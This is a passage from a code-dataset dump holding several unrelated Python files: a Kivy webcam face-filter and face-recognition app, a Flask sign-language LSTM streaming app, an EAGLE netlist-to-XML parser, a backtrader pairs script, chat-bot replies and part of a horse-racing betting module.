#convert frame to texture\n buf = cv.flip(frame, 0)\n #buf = buf.tostring()\n buf = buf.tobytes()\n\n texture_f = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n\n # display frame from the texture\n self.ids.cam.texture = texture_f \n\n def glasses(self, dt):\n # Apply glassess + Mustache feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=10,\n minSize=(100, 100),\n flags=cv.CASCADE_SCALE_IMAGE)\n\n frame = cv.cvtColor(frame, cv.COLOR_BGR2BGRA)\n\n for (x, y, w, h) in faces:\n roi_gray = gray[y:y+h, x:x+h]\n roi_color = frame[y:y+h, x:x+h]\n\n eyes = eyes_cascade.detectMultiScale(roi_gray)\n for (ex, ey, ew, eh) in eyes:\n roi_eyes = roi_gray[ey: ey + eh, ex: ex + ew]\n glasses2 = image_resize(glasses.copy(), width=ew)\n\n gw, gh, gc = glasses2.shape\n for i in range(0, gw):\n for j in range(0, gh):\n if glasses2[i, j][3] != 0: # alpha 0\n roi_color[ey + i, ex + j] = glasses2[i, j]\n\n\n nose = nose_cascade.detectMultiScale(roi_gray, scaleFactor=1.2, minNeighbors=20)\n for (nx, ny, nw, nh) in nose:\n roi_nose = roi_gray[ny: ny + nh, nx: nx + nw]\n mustache2 = image_resize(mustache.copy(), width=nw)\n\n mw, mh, mc = mustache2.shape\n for i in range(0, mw):\n for j in range(0, mh):\n if mustache2[i, j][3] != 0: # alpha 0\n roi_color[ny + int(nh/2.0) + i, nx + j] = mustache2[i, j]\n\n # Display the resulting frame\n frame = cv.cvtColor(frame, cv.COLOR_BGRA2BGR)\n\n #convert frame to texture\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n\n texture1 = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \n texture1.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n\n # display frame from the texture\n self.ids.cam.texture = texture1 \n\n def detect_faces(self, dt):\n # apply detect faces feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=10,\n minSize=(100, 100),\n flags=cv.CASCADE_SCALE_IMAGE)\n\n for (x,y,w,h) in faces:\n cv.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n texture_f = 
Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')\n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n # display image from the texture\n self.ids.cam.texture = texture_f\n\n def identify_faces(self, dt):\n # Apply identify faces feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,\n scaleFactor=1.1,\n minNeighbors=10,\n minSize=(100, 100),\n flags=cv.CASCADE_SCALE_IMAGE)\n rgb = cv.cvtColor(frame, cv.COLOR_BGR2RGB)\n # the facial embeddings for face in input\n encodings = face_recognition.face_encodings(rgb)\n names = []\n\n for encoding in encodings:\n matches = face_recognition.compare_faces(faces_data[\"encodings\"], encoding)\n name = \"Unknown\"\n\n if True in matches:\n #Find positions at which we get True and store them\n matched_idxs = [i for (i, b) in enumerate(matches) if b]\n counts = {}\n # loop over the matched indexes and maintain a count for each recognized face face\n for i in matched_idxs:\n #Check the names at respective indexes we stored in matched_idxs\n name = faces_data[\"names\"][i]\n #increase count for the name we got\n counts[name] = counts.get(name, 0) + 1\n #set name which has highest count\n name = max(counts, key=counts.get)\n \n # update the list of names\n names.append(name)\n # loop over the recognized faces\n for (x, y, w, h), name in zip(faces, names):\n # draw the predicted face name on the image\n cv.rectangle(frame, (x, y),(x+w, y+h),(0,255,0),2)\n cv.rectangle(frame, (x-10, y+h),(x+w+10, y+int(h*1.15)),(0,255,0), -1)\n cv.putText(frame, name, (x-5, y+int(h*1.11)), cv.FONT_HERSHEY_SIMPLEX, w/250, (255, 255, 255), 2)\n\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n texture_f = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n # display image from the texture\n self.ids.cam.texture = texture_f \n\n def capture_screen(self):\n # capture screen frame to gallery\n\n ret, frame = self.capture.read()\n DIR = './gallery'\n images = [name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))]\n count = len(images)\n while 'capture{}.jpg'.format(count) in images:\n count+=1\n cv.imwrite('gallery/capture{}.jpg'.format(count), frame)\n\n def painter(self, dt):\n # apply painter feature\n\n ret, frame = self.capture.read()\n frame = cv.resize(frame, (1090, 720), interpolation = cv.INTER_AREA)\n frame_w, frame_h, _ = frame.shape\n frame = cv.flip(frame, 1) #Mirror\n hsv = cv.cvtColor(frame, cv.COLOR_BGR2HSV)\n\n # Add the coloring options to the frame\n center_x, center_y = int(frame_w/2.5), int(frame_h/15)\n radius = 60\n space = 2*radius + 40\n\n #Clear button\n cv.circle(frame, (center_x, center_y), radius, colors[6], -1)\n cv.putText(frame, \"CLEAR\", (center_x-radius+20, center_y+10), font, .8, colors[4], 2)\n\n #Blue button\n cv.circle(frame, (center_x+space, center_y), radius, colors[0], -1)\n cv.putText(frame, \"BLUE\", (center_x+space-radius+25, center_y+10), font, .8, colors[4], 2)\n\n #Green button\n cv.circle(frame, (center_x+2*space, center_y), radius, colors[1], -1)\n cv.putText(frame, \"GREEN\", (center_x+2*space-radius+20, center_y+10), font, .8, colors[4], 2)\n\n #Red button\n cv.circle(frame, (center_x+3*space, center_y), radius, colors[2], -1)\n cv.putText(frame, \"RED\", (center_x+3*space-radius+35, center_y+10), font, .8, colors[4], 2)\n\n # Determine 
which pixels fall within the blue boundaries and then blur the binary image\n blue_mask = cv.inRange(hsv, blue_lower, blue_upper)\n blue_mask = cv.erode(blue_mask, kernel, iterations=2)\n blue_mask = cv.morphologyEx(blue_mask, cv.MORPH_OPEN, kernel)\n blue_mask = cv.dilate(blue_mask, kernel, iterations=1)\n\n # Find contours in the image\n cnts, _ = cv.findContours(blue_mask.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n center = None\n\n # Check to see if any contours were found\n if len(cnts) > 0:\n \t # Sort the contours and find the largest one -- we\n \t # will assume this contour correspondes to the area of the bottle cap\n cnt = sorted(cnts, key = cv.contourArea, reverse = True)[0]\n # Get the radius of the enclosing circle around the found contour\n ((x, y), radius) = cv.minEnclosingCircle(cnt)\n # Draw the circle around the contour\n cv.circle(frame, (int(x), int(y)), int(radius), colors[3], 2)\n # Get the moments to calculate the center of the contour (in this case Circle)\n M = cv.moments(cnt)\n center = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))\n \n global bpoints, gpoints, rpoints, bindex, gindex, rindex, colorIndex\n if center_y-radius <= center[1] <= center_y+radius:\n if center_x-radius <= center[0] <= center_x+radius: # Clear All\n bpoints = [deque(maxlen=512)]\n gpoints = [deque(maxlen=512)]\n rpoints = [deque(maxlen=512)]\n\n bindex = 0\n gindex = 0\n rindex = 0\n\n elif center_x+space-radius <= center[0] <= center_x+space+radius:\n colorIndex = 0 # Blue\n elif center_x+2*space-radius <= center[0] <= center_x+2*space+radius:\n colorIndex = 1 # Green\n elif center_x+3*space-radius <= center[0] <= center_x+3*space+radius:\n colorIndex = 2 # Red\n else :\n if colorIndex == 0:\n bpoints[bindex].appendleft(center)\n elif colorIndex == 1:\n gpoints[gindex].appendleft(center)\n elif colorIndex == 2:\n rpoints[rindex].appendleft(center)\n\n # Append the next deque when no contours are detected (i.e., bottle cap reversed)\n else:\n bpoints.append(deque(maxlen=512))\n bindex += 1\n gpoints.append(deque(maxlen=512))\n gindex += 1\n rpoints.append(deque(maxlen=512))\n rindex += 1\n\n # Draw lines of all the colors (Blue, Green and Red)\n points = [bpoints, gpoints, rpoints]\n for i in range(len(points)):\n for j in range(len(points[i])):\n for k in range(1, len(points[i][j])):\n if points[i][j][k - 1] is None or points[i][j][k] is None:\n continue\n cv.line(frame, points[i][j][k - 1], points[i][j][k], colors[i], 2)\n\n buf = cv.flip(frame, 0)\n buf = buf.tobytes()\n texture_f = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')\n texture_f.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\n # display image from the texture\n self.ids.cam.texture = texture_f\n \n def update_faces_data(self):\n get_faces_data(\"ab\")\n\nkv = Builder.load_file(\"screens.kv\")\n\nclass FaceAPP(App):\n def build(self):\n Window.size = (1115, 540)\n Window.minimum_width = 1115\n Window.minimum_height = 540\n #Window.clearcolor = (.7, .7, .7, 1)\n #Window.borderless = \"1\"\n #Window.fullscreen = 'fake'\n #Window.set_system_cursor('size_we')\n Window.softinput_mode = 'resize'\n return kv\n\nFaceAPP().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67525214","text":"from flask import Flask,render_template,Response,request\nimport cv2\nimport time\nimport sys\n\nimport numpy as np\nimport os\nfrom matplotlib import pyplot 
as plt\nimport mediapipe as mp\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\n#from tensorflow.keras.callbacks import TensorBoard\n\nsys.path.append('./mediapipe_functions.py')\nfrom mediapipe_functions import mediapipe_detection, draw_landmarks, draw_styled_landmarks, extract_keypoints\n\nvideo_id = 'no'\n\napp=Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n if request.method == 'POST':\n if request.form.get('LSTM_model') == 'start_detection':\n #print('hello123')\n video_id = 'lstm'\n \"\"\"Video streaming home page.\"\"\"\n return render_template('index.html')\n\n\n# Use Holistic Models for detections\nmp_holistic = mp.solutions.holistic # Holistic model\nmp_drawing = mp.solutions.drawing_utils # Drawing utilities\n\n'''\n# Make keypoint detection, model can only detect in RGB\ndef mediapipe_detection(image, model):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # COLOR CONVERSION BGR 2 RGB as model can only detect in RGB\n image.flags.writeable = False # Image is no longer writeable\n results = model.process(image) # Use Model to make prediction\n image.flags.writeable = True # Image is now writeable \n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # COLOR COVERSION RGB 2 BGR\n return image, results\n\ndef draw_landmarks(image, results): # draw landmarks for each image/frame\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_CONTOURS) # Draw face connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS) # Draw pose connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS) # Draw right hand connections\n \n \ndef draw_styled_landmarks(image, results): # draw landmarks for each image/frame, fix colour of landmark drawn\n # Draw face connections\n mp_drawing.draw_landmarks(image, results.face_landmarks, mp_holistic.FACEMESH_CONTOURS, \n mp_drawing.DrawingSpec(color=(80,110,10), thickness=1, circle_radius=1), \n mp_drawing.DrawingSpec(color=(80,256,121), thickness=1, circle_radius=1)\n ) \n # Draw pose connections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(80,22,10), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(80,44,121), thickness=2, circle_radius=1)\n ) \n # Draw left hand connections\n mp_drawing.draw_landmarks(image, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(121,22,76), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(121,44,250), thickness=2, circle_radius=1)\n ) \n # Draw right hand connections \n mp_drawing.draw_landmarks(image, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS, \n mp_drawing.DrawingSpec(color=(245,117,66), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(245,66,230), thickness=2, circle_radius=1)\n ) \n'''\n# define extract keypoint function\ndef extract_keypoints(results):\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33*4)\n face = np.array([[res.x, res.y, res.z] for res in results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(468*3)\n lh = np.array([[res.x, res.y, res.z] for res in 
results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(21*3)\n rh = np.array([[res.x, res.y, res.z] for res in results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(21*3)\n return np.concatenate([pose, face, lh, rh]) # concatenate all the keypoints that are flattened\n\n\n# Actions that we try to detect\n#actions = np.array(['hello', 'thanks', 'iloveyou'])\nactions = np.array(['Alligator','Butterfly','Cow','Elephant','Gorilla'])\n\nlabel_map = {label:num for num, label in enumerate(actions)} #create label map dictionary\n\nmodel = Sequential()\nmodel.add(LSTM(64, return_sequences=True, activation='relu', input_shape=(30,1662))) #each video has input shape of 30 frames of 1662 keypoints: X.shape\nmodel.add(LSTM(128, return_sequences=True, activation='relu'))\nmodel.add(LSTM(64, return_sequences=False, activation='relu')) #next layer is a dense layer so we do not return sequences here\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dense(actions.shape[0], activation='softmax'))\n\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=['categorical_accuracy'])\n\nprint('Loading Model...')\n#model.load_weights('./models/first_model_action.h5')\n#model.load_weights('./models/animal_asl_5_classes_1000_epoch_action.h5')\nmodel.load_weights('./models/Epoch-144-Loss-0.53.h5')\nprint('Model Loaded!')\n\ncolors = [(245,221,173), (245,185,265), (146,235,193),(204,152,295),(255,217,179)]\ndef prob_viz(res, actions, input_frame, colors):\n output_frame = input_frame.copy()\n for num, prob in enumerate(res):\n cv2.rectangle(output_frame, (0,60+num*40), (int(prob*100), 90+num*40), colors[num], -1) #change length of bar depending on probability\n cv2.putText(output_frame, actions[num]+' '+str(round(prob*100,2))+'%', (0, 85+num*40), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0,0,0), 1, cv2.LINE_AA)\n #cv2.putText(image, text, org, font, fontScale, color[, thickness[, lineType[, bottomLeftOrigin]]])\n return output_frame\n\n\ndef gen():\n # 1. New detection variables\n sequence = []\n sentence = []\n predictions = []\n threshold = 0.5\n \"\"\"Video streaming generator function.\"\"\"\n cap = cv2.VideoCapture(0)\n sent =''\n \n with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:\n # Read until video is completed\n while(cap.isOpened()):\n # Capture frame-by-frame\n ret, image = cap.read()\n if ret == True:\n #img = cv2.resize(img, (0,0), fx=0.5, fy=0.5) \n\n # Make detections\n image, results = mediapipe_detection(image, holistic)\n #print(results)\n\n # Draw landmarks\n draw_styled_landmarks(image, results)\n\n\n # 2. Prediction logic\n keypoints = extract_keypoints(results)\n sequence.append(keypoints)\n sequence = sequence[-30:]\n \n if len(sequence) == 30:\n res = model.predict(np.expand_dims(sequence, axis=0))[0]\n #print(actions[np.argmax(res)])\n predictions.append(np.argmax(res))\n \n #3. 
Viz logic\n if np.unique(predictions[-10:])[0]==np.argmax(res): \n if res[np.argmax(res)] > threshold: \n \n if len(sentence) > 0: \n # if action is not in the last sentence, then we append the last action to the sentence\n if actions[np.argmax(res)] != sentence[-1]: \n sentence.append(actions[np.argmax(res)])\n else:\n sentence.append(actions[np.argmax(res)])\n\n if len(sentence) > 5: \n sentence = sentence[-5:]\n \n # Viz probabilities\n image = prob_viz(res, actions, image, colors)\n \n cv2.rectangle(image, (0,0), (700, 40), (0, 60, 123), -1)\n cv2.putText(image, ' '.join(sentence), (3,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2, cv2.LINE_AA)\n\n\n #encode output image to bytes\n frame = cv2.imencode('.jpg', image)[1].tobytes()\n\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n #time.sleep(0.1)\n\n else: \n break\n\n@app.route('/video_feed')\ndef video_feed():\n \"\"\"Video streaming route. Put this in the src attribute of an img tag.\"\"\"\n\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\n\n\n\nif __name__==\"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"443531523","text":"'''\nCreated on Feb 13, 2015\n\n@author: Max Ruiz\n'''\nimport tkFileDialog as tf\nimport tkFileDialog\nimport xml.etree.ElementTree as ET\nimport re\n\n#Generic file IO\nclass FileManip():\n def __init__(self):\n self.fileOptions()\n\n def fileOptions(self):\n self.fopt = file_opt = {}\n file_opt['defaultextension'] = '.csv'\n file_opt['filetypes'] = [('Comma Separated Values', '.csv'), ('Excel', '.xlsx'), ('All Files', '.*')]\n file_opt['initialdir'] = 'C:\\\\'\n file_opt['multiple'] = False\n file_opt['title'] = 'File'\n\n def openFile(self):\n return tf.askopenfile(mode = 'r', **self.fopt)\n\n def openFilename(self):\n return tf.askopenfilename(**self.fopt)\n\n def saveFile(self):\n return tf.asksaveasfile(mode = 'w', **self.fopt)\n\n def saveFilename(self):\n return tf.asksaveasfilename(**self.fopt)\n\n def getDirectory(self):\n return tf.askdirectory(**self.fopt)\n\n def extendFileOptions(self, xopts={}):\n for opt in xopts:\n try:\n self.fopt[opt] = xopts[opt]\n except:\n # poor/bad option\n pass\n\n# Net Checker specific file IO\nclass HandleFile():\n def __init__(self):\n self.fileOptions()\n self.netList = {}\n self.nets = []\n self.fName = ''\n\n def fileOptions(self):\n self.fopen = file_opt = {}\n file_opt['defaultextension'] = '.txt'\n file_opt['filetypes'] = [('Text File', '.txt'), ('All Files', '.*')]\n file_opt['initialdir'] = 'C:\\\\'\n file_opt['multiple'] = False\n file_opt['title'] = 'Select Net List Text File'\n\n def openUsrFile(self):\n fileDir = tf.askopenfilename(**self.fopen)\n # Must parse loaded file because it comes as the whole directory instead of just the file.\n fileName = re.findall(r'/([\\w]+\\.txt)', fileDir)\n try:\n self.fName = fileName[0]\n except:\n self.fName = 'Could not parse file name.'\n try:\n\n self.file = open(fileDir, 'r')\n self.parseNetList()\n return 'File loaded: ' + self.fName # success message\n except:\n return 'Please open a file to continue' # error message\n\n def parseNetList(self):\n netName = ''\n parts = []\n done = False\n\n for row in self.file:\n line = row.split()\n lenLine = len(line)\n # The EAGLE net list has bogus lines it generates with the actual net list\n # This will filter out the 
bogus lines.\n # The format for the EAGLE net list is:\n # Trace Part Pad Pin Sheet\n # Part Pad Pin Sheet\n # . . . .\n if lenLine > 1 and lenLine < 6 and line[0] != 'Net':\n if lenLine > 4:\n if done:\n self.netList[netName] = parts\n self.nets.append(netName)\n parts = []\n\n netName = line[0]\n line.remove(netName) # The first element in the array greater than 4 is\n # removed because it follows a difference pattern\n # than subsequent entries and it is to be separated\n # from the rest of the data until the end\n # when everything is stored in a dictionary under\n # that trace name\n\n parts.append(line)\n done = True\n\n self.file.close()\n\n def saveFileToXML(self):\n try: # This will catch the error caused by no file loaded yet\n\n self.xmlFileName = self.fName.replace('.txt', '.xml')\n\n try: # This will catch the error based on the XML file not having been created yet\n nlt = ET.parse(self.xmlFileName)\n netroot = nlt.getroot()\n netroot.clear()\n except:\n n = ET.Element('Netlist')\n tree = ET.ElementTree(n)\n tree.write(self.xmlFileName)\n nlt = ET.parse(self.xmlFileName)\n netroot = nlt.getroot()\n\n for net in self.nets:\n trace = ET.SubElement(netroot, 'Trace')\n trace.set('TName', net)\n\n for parts in self.netList[net]:\n part = ET.SubElement(trace, 'Part')\n part.set('PName', parts[0])\n\n pad = ET.SubElement(part, 'Pad')\n pad.text = str(parts[1])\n pin = ET.SubElement(part, 'Pin')\n pin.text = str(parts[2])\n sheet = ET.SubElement(part, 'Sheet')\n sheet.text = str(parts[3])\n\n nlt.write(self.xmlFileName)\n return 'XML file has been saved as ' + self.xmlFileName # success message\n\n except:\n return 'Please open a net list text file first.' # error message\n\n def getNets(self):\n return self.nets\n\n def getNetlist(self):\n return self.netList\n\n def getFName(self):\n return self.fName\n","sub_path":"FileCommands.py","file_name":"FileCommands.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129621575","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Nov 28 11:49:50 2017\r\n\r\n@author: junbai\r\n\r\nEU and CN HRC Index Pair \r\n\"\"\"\r\n\r\nfrom __future__ import (absolute_import, division, print_function,\r\n unicode_literals)\r\n\r\n# Reference\r\n# https://estrategiastrading.com/oro-bolsa-estadistica-con-python/\r\n\r\nimport datetime\r\nimport pandas as pd\r\n\r\nimport scipy.stats\r\n\r\nimport backtrader as bt\r\n\r\n\r\nclass PearsonR(bt.ind.PeriodN):\r\n _mindatas = 2 # hint to the platform\r\n\r\n lines = ('correlation',)\r\n params = (('period', 20),)\r\n\r\n def next(self):\r\n c, p = scipy.stats.pearsonr(self.data0.get(size=self.p.period),\r\n self.data1.get(size=self.p.period))\r\n\r\n self.lines.correlation[0] = c\r\n\r\n\r\nclass MACrossOver(bt.Strategy):\r\n params = (\r\n ('ma', bt.ind.MovAv.SMA),\r\n ('pd1', 20),\r\n ('pd2', 20),\r\n )\r\n\r\n def __init__(self):\r\n ma1 = self.p.ma(self.data0, period=self.p.pd1, subplot=True)\r\n self.p.ma(self.data1, period=self.p.pd2, plotmaster=ma1)\r\n PearsonR(self.data0, self.data1)\r\n\r\n\r\ndef runstrat(args=None):\r\n\r\n cerebro = bt.Cerebro()\r\n\r\n df = pd.read_csv(\"C:/Users/j291414/Desktop/data.csv\")\r\n df.index = pd.to_datetime(df['Date'], format=\"%d/%m/%Y\")\r\n df0 = pd.DataFrame({'close':df['EU']})\r\n df1 = pd.DataFrame({'close':df['CN']})\r\n data0 = bt.feeds.PandasData(dataname=df0)\r\n data1 = bt.feeds.PandasData(dataname=df1)\r\n data1.plotinfo.plotmaster = data0\r\n 
cerebro.adddata(data0)\r\n cerebro.adddata(data1)\r\n\r\n\r\n\r\n # Strategy\r\n cerebro.addstrategy(MACrossOver)\r\n\r\n cerebro.addobserver(bt.observers.LogReturns2,\r\n timeframe=bt.TimeFrame.Weeks,\r\n compression=20)\r\n\r\n # Execute\r\n cerebro.run()\r\n\r\n cerebro.plot()\r\n \r\nrunstrat()","sub_path":"my algorithms/quant_trading/backtrader/samples/pairs/HRC_index_pair.py","file_name":"HRC_index_pair.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268259212","text":"command_list = {\r\n 'hello' : 'hello!',\r\n 'gm' : 'gm!',\r\n 'gn' : 'good night😴'\r\n}\r\n\r\ncommand_question = ['hello' , 'gm' , 'gn']\r\n\r\nrandom_reply_list = [\r\n'☃️do you want to build a snowman?☃️',\r\n'very chilly',\r\n'❄️xue hua piao piao❄️', \r\n'hello world!',\r\n'mmm yum',\r\n';-;',\r\n'eheu!',\r\n'hello there!',\r\n\r\n] ","sub_path":"snowbot_commands.py","file_name":"snowbot_commands.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"614512850","text":"from modules.extract import Extract\nfrom modules.transform import Transform\nfrom modules.simulation import Simulation\nimport modules.util as mu\n\nimport slackweb\nimport pandas as pd\nimport my_config as mc\nimport os\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport glob\n\nclass Output(object):\n slack_operation_url = mc.SLACK_operation_webhook_url\n slack_summary_url = mc.SLACK_summary_webhook_url\n slack_realtime_url = mc.SLACK_realtime_webhook_url\n kaime_columns = [\"RACE_ID\", \"エリア\", \"券種\", \"購入金額\", \"目1\", \"目2\", \"目3\"]\n\n def __init__(self, start_date, end_date, term_start_date, term_end_date, test_flag, target_sr, cond_df):\n self.start_date = start_date\n self.end_date = end_date\n self.term_start_date = term_start_date\n self.term_end_date = term_end_date\n mock_flag = False\n self.ext = Extract(start_date, end_date, mock_flag)\n self.tf = Transform(start_date, end_date)\n self.dict_path = mc.return_jra_path(test_flag)\n self.pred_folder_path = self.dict_path + 'pred/'\n self.target_path = mc.return_target_path(test_flag)\n self.ext_score_path = self.target_path + 'ORIGINAL_DATA/'\n self.auto_bet_path = self.target_path + 'AUTO_BET/'\n self.for_pbi_path = self.target_path + 'pbi/'\n self._set_file_list()\n self._set_vote_condition(target_sr, cond_df)\n\n def _set_vote_condition(self, target_sr, cond_df):\n self.win_rate = target_sr[\"win_rate\"]\n self.jiku_rate = target_sr[\"jiku_rate\"]\n self.ana_rate = target_sr[\"ana_rate\"]\n print(f\"----- mark rate: win:{self.win_rate}% jiku:{self.jiku_rate}% ana:{self.ana_rate}%\")\n tansho_sr = cond_df.query(\"タイプ == '単勝'\")\n print(tansho_sr[\"オッズ条件\"])\n self.tansho_flag = False if tansho_sr.empty else True\n if self.tansho_flag:\n self.tansho_cond = tansho_sr[\"条件\"].values[0]\n self.tansho_odds_cond = tansho_sr[\"オッズ条件\"].values[0]\n fukusho_sr = cond_df.query(\"タイプ == '複勝'\")\n self.fukusho_flag = False if fukusho_sr.empty else True\n if self.fukusho_flag:\n self.fukusho_cond = fukusho_sr[\"条件\"].values[0]\n self.fukusho_odds_cond = fukusho_sr[\"オッズ条件\"].values[0]\n umaren_sr = cond_df.query(\"タイプ == '馬連'\")\n self.umaren_flag = False if umaren_sr.empty else True\n if self.umaren_flag:\n self.umaren1_cond = umaren_sr[\"条件\"].values[0][0]\n self.umaren2_cond = umaren_sr[\"条件\"].values[0][1]\n self.umaren_odds_cond = umaren_sr[\"オッズ条件\"].values[0]\n umatan_sr = 
cond_df.query(\"タイプ == '馬単'\")\n self.umatan_flag = False if umatan_sr.empty else True\n if self.umatan_flag:\n self.umatan1_cond = umatan_sr[\"条件\"].values[0][0]\n self.umatan2_cond = umatan_sr[\"条件\"].values[0][1]\n self.umatan_odds_cond = umatan_sr[\"オッズ条件\"].values[0]\n wide_sr = cond_df.query(\"タイプ == 'ワイド'\")\n self.wide_flag = False if wide_sr.empty else True\n if self.wide_flag:\n self.wide1_cond = wide_sr[\"条件\"].values[0][0]\n self.wide2_cond = wide_sr[\"条件\"].values[0][1]\n self.wide_odds_cond = wide_sr[\"オッズ条件\"].values[0]\n sanrenpuku_sr = cond_df.query(\"タイプ == '三連複'\")\n self.sanrenpuku_flag = False if sanrenpuku_sr.empty else True\n if self.sanrenpuku_flag:\n self.sanrenpuku1_cond = sanrenpuku_sr[\"条件\"].values[0][0]\n self.sanrenpuku2_cond = sanrenpuku_sr[\"条件\"].values[0][1]\n self.sanrenpuku3_cond = sanrenpuku_sr[\"条件\"].values[0][2]\n self.sanrenpuku_odds_cond = sanrenpuku_sr[\"オッズ条件\"].values[0]\n\n def _set_file_list(self):\n race_base_df = self.ext.get_race_before_table_base()[[\"RACE_KEY\", \"NENGAPPI\", \"距離\", \"芝ダ障害コード\", \"内外\", \"条件\"]]\n race_base_df.loc[:, \"RACE_ID\"] = race_base_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]),\n axis=1)\n race_base_df.loc[:, \"file_id\"] = race_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_target_file(x))\n race_base_df.loc[:, \"nichiji\"] = race_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_kaiji(x[5:6]))\n race_base_df.loc[:, \"race_no\"] = race_base_df[\"RACE_KEY\"].str[6:8]\n race_base_df.loc[:, \"rc_file_id\"] = race_base_df[\"RACE_KEY\"].apply(lambda x: \"RC\" + x[0:5])\n race_base_df.loc[:, \"kc_file_id\"] = \"KC\" + race_base_df[\"RACE_KEY\"].str[0:6]\n\n update_term_df = race_base_df.query(f\"NENGAPPI >= '{self.term_start_date}' and NENGAPPI <= '{self.term_end_date}'\")\n print(race_base_df.shape)\n print(f\"NENGAPPI >= '{self.term_start_date}' and NENGAPPI <= '{self.term_end_date}'\")\n print(update_term_df.shape)\n self.race_base_df = race_base_df\n self.file_list = update_term_df[\"file_id\"].drop_duplicates()\n self.date_list = update_term_df[\"NENGAPPI\"].drop_duplicates()\n self.rc_file_list = update_term_df[\"rc_file_id\"].drop_duplicates()\n self.kc_file_list = update_term_df[\"kc_file_id\"].drop_duplicates()\n\n\n def get_pred_df(self, model_version, target):\n \"\"\" 予測したtargetのデータを取得する \"\"\"\n target_filelist = self._get_file_list_for_pred(model_version)\n df = pd.DataFrame()\n for filename in target_filelist:\n temp_df = pd.read_pickle(filename)\n df = pd.concat([df, temp_df])\n df = df.query(f\"target == '{target}'\")\n return df\n\n def _get_file_list_for_pred(self, folder):\n \"\"\" predで予測したファイルの対象リストを取得する\"\"\"\n folder_path = self.pred_folder_path + folder + \"/*.pkl\"\n filelist = 